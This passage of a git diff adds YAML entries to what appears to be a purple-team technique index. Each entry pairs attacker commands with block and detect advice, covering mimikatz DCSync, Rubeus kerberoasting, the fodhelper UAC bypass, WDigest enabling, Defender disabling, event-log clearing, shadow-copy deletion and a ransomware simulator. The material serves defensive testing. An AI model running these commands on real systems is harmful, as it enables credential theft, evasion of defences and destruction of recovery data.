+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 95790889-fb7d-42af-a221-3535e4197cde
+  tid: T1555.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/SharpDPAPI
+  x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  tid: T1112
+  tactic: TA0005
+  x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  tid: T1558.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/Rubeus
+  x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  isv: 1
diff --git a/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/fs-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  tid: T1003.006
+  tactic: TA0006
+  x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  tid: T1070.001
+  tactic: TA0005
+  x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 2496e250-5757-482f-9661-daea872395ae
+  tid: T1574.002
+  tactic: TA0005
+  x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+  id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  tid: T1014
+  tactic: TA0005
+  x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  tid: T1548.002
+  tactic: TA0004
+  x_references:
+  - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+  x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  tid: T1218.011
+  tactic: TA0005
+  x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+  id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  tid: T1562.001
+  tactic: TA0005
+  x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  isv: 1
diff --git a/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/fs-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  tid: T1484
+  tactic: TA0003
+  x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
new file mode 100644
index 0000000..dbf086a
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
@@ -0,0 +1,24 @@
+name: Internal network scan using Net Scan
+description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+platforms:
+- windows
+guidance:
+- cmd> {{ netscan_binary }}
+block:
+- Network security controls block source generating a large volume of connection requests
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- ID/PS
+- Firewall
+- SIEM
+- Application Control
+metadata:
+  id: 3f120c23-78c0-462f-808f-38ef4f607233
+  tid: T1046
+  tactic: TA0007
+  x_tools:
+  - https://www.softperfect.com/products/networkscanner/
+  x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
new file mode 100644
index 0000000..751b34b
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
@@ -0,0 +1,20 @@
+name: Domain trust discovery via nltest
+description: Identify domain trust relationships using nltest.exe
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /domain_trusts /all_trusts
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  tid: T1482
+  tactic: TA0007
+  x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: 672f8861-c914-4f58-b861-5107ce19f61c
+  tid: T1087.002
+  tactic: TA0007
+  x_tools:
+  - https://github.com/BloodHoundAD/SharpHound
+  x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  tid: T1087.002
+  tactic: TA0007
+  x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml b/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
new file mode 100644
index 0000000..1c91bac
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
@@ -0,0 +1,19 @@
+name: Retrieve system information
+description: Retrieve information about the system using multiple builtin commands
+platforms:
+- windows
+guidance:
+- CMD> systeminfo ipconfig tasklist sc query wmic product get
+block:
+- ''
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9064e91a-be78-48a5-9112-28d5701d6d51
+  tid: T1082
+  tactic: TA0007
+  x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+  isv: 1
diff --git a/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/fs-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  tid: T1018
+  tactic: TA0007
+  x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  isv: 1
diff --git a/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/fs-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+  id: a7134d71-dc49-41a8-a309-ec520c96a089
+  tid: T1221
+  tactic: TA0005
+  x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+  isv: 1
diff --git a/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/fs-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  isv: 1
diff --git a/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/fs-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  tid: T1567.002
+  tactic: TA0010
+  x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  isv: 1
diff --git a/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/fs-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  tid: T1041
+  tactic: TA0010
+  x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  isv: 1
diff --git a/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/fs-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  tid: T1490
+  tactic: TA0040
+  x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  isv: 1
diff --git a/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/fs-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  tid: T1484.001
+  tactic: TA0005
+  x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  isv: 1
diff --git a/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/fs-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+  id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  tid: T1486
+  tactic: TA0040
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+  x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
new file mode 100644
index 0000000..b95efea
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
@@ -0,0 +1,16 @@
+name: Suspicious service use
+description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+controls:
+- SIEM
+metadata:
+  id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml b/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml
new file mode 100644
index 0000000..c26118f
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/44fd7250-e613-441f-9cb6-5b98c2d71338.yml
@@ -0,0 +1,20 @@
+name: External employee portal spray
+description: Perform a password spray against an external employee login portal using a list of potential users and a single password
+platforms:
+guidance:
+- Burp -> intruder
+block:
+- Portal protected with secure MFA solution
+- IdP blocks bulk automated requests
+detect:
+- Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs
+- Web application logs are ingested into the SIEM and alerts triggered for suspicious activity (e.g. brute force attacks, large number of 400/500 status codes)
+controls:
+- IdP
+- SIEM
+metadata:
+  id: 44fd7250-e613-441f-9cb6-5b98c2d71338
+  tid: T1110.003
+  tactic: TA0006
+  x_vectr_id: 44fd7250-e613-441f-9cb6-5b98c2d71338
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
new file mode 100644
index 0000000..7e31368
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
@@ -0,0 +1,17 @@
+name: Suspicious external employee login
+description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+platforms:
+guidance:
+block:
+- Suspicious logins originating from select geolocations are blocked
+detect:
+- Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+controls:
+- SIEM
+- IdP
+metadata:
+  id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml b/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
new file mode 100644
index 0000000..a4d1696
